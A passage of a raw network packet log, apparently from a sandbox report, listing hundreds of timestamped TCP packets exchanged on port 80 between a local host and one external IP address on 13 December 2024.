                                                                                                                                                                Dec 13, 2024 01:37:36.005224943 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005234957 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005243063 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005249977 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005258083 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005271912 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005294085 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005301952 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005307913 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005315065 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005331993 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005340099 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005361080 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005373955 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005381107 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005400896 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005409956 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005415916 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005538940 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005547047 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005553007 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005562067 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005568981 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005577087 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005584955 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005590916 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005599022 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005606890 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005615950 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005626917 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005640984 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005647898 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005655050 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005661964 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005669117 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005676031 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005683899 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005692005 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005698919 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.005707026 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006192923 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006232023 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006239891 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006313086 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006320953 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006329060 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006347895 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006359100 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006367922 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006422043 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006429911 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006441116 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006453991 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006463051 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006470919 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006498098 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006506920 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006513119 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006532907 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006541014 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006685972 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006695032 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006701946 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006711006 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006719112 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006725073 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006732941 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006741047 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006752014 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006758928 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006767035 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006774902 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006783009 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006791115 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.006798029 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007339001 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007353067 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007359982 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007368088 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007378101 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007405996 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007415056 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007427931 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007436037 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007462025 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007469893 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007482052 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007491112 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007529020 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007541895 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007555962 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007570982 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007580042 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007635117 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007662058 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007729053 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007740974 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007755041 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007761955 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007770061 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007777929 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007781029 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007786989 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007796049 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007803917 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007812023 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007818937 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007827044 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007834911 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007843971 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007850885 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007858038 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007865906 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.007921934 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008409977 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008511066 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008522034 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008543015 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008550882 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008557081 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008563995 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008586884 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008594990 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008600950 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008611917 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008626938 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008634090 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008647919 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008657932 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008682013 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008688927 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008696079 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008794069 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008801937 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008807898 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008816004 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008822918 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008831024 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008836985 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008845091 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008852959 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008860111 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008867025 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008876085 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008915901 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008924961 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008932114 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008939981 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008948088 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008955002 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008961916 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008970022 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008976936 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008984089 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008991003 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.008997917 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009450912 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009459972 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009469986 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009479046 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009486914 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009502888 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009510994 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009578943 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009593964 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009602070 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009609938 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009617090 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009624958 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009643078 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009650946 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009661913 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009675980 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009685993 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009692907 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009700060 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009799957 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009808064 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009814978 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009824038 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009830952 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009839058 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009846926 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009855986 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009862900 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.009871006 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011336088 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011356115 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011368036 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011377096 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011452913 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011495113 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011503935 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011509895 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011538982 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011554003 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011570930 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011586905 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011605024 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011615992 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011621952 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011630058 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011636972 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011655092 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011662960 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011780977 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011790037 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011795998 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011804104 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011811018 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011817932 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011825085 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011832952 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011841059 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011848927 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011857033 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011864901 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011877060 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011887074 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011894941 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011915922 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011924028 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011929989 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011938095 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011945009 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011953115 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011960030 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011966944 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011974096 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.011982918 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012262106 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012270927 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012285948 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012294054 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012332916 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012341976 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012348890 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012362957 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012376070 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012382984 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012423038 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012429953 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012447119 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012460947 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012471914 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012494087 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012510061 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012517929 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012526989 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012545109 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012609959 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012619019 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012624979 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.012633085 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014066935 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014076948 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014089108 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014096975 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014103889 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014111996 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014127970 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014136076 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014143944 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014170885 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014178991 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014184952 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014203072 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014211893 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014230967 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014239073 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014245033 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014252901 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014261007 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014362097 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014370918 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014377117 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014384031 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014391899 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014399052 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014425039 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014431953 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014440060 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.014447927 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.029777050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.029777050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.029827118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.029957056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.029984951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030003071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030025959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030040026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030065060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030076981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030101061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030121088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030180931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030208111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030222893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030247927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030263901 CET4977580192.168.2.5185.81.68.147
